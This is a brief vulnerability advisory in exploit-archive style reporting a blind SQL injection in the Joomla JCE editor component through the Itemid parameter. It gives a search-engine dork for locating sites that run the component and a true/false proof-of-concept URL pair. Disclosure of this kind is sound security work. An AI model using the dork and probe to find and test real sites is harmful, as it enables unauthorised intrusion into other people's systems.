=================================================================== joomlacontenteditor (com_jce) BLIND sql injection vulnerability
=================================================================== Software: joomlacontenteditor (com_jce) Vendor: www.joomlacontenteditor.net Vuln Type: BLind SQL Injection Download link: http://www.joomlacontenteditor.net/downloads/editor/joomla15x/category/joomla-15-2 (check here) Author: eidelweiss contact: eidelweiss[at]windowslive[dot]com Home: www.eidelweiss.info Dork: inurl:"/index.php?option=com_jce" References: http://eidelweiss-advisories.blogspot.com/2011/04/joomlacontenteditor-comjce-blind-sql.html =================================================================== Description: JCE makes creating and editing Joomla!® content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS... =================================================================== exploit & p0c [!] index.php?option=com_jce&Itemid=[valid Itemid] Example p0c [!] http://host/index.php?option=com_jce&Itemid=8 <= True [!] http://host/index.php?option=com_jce&Itemid=-8 <= False ==================================================================== Nothing Impossible In This World Even Nobody`s Perfect ===================================================================
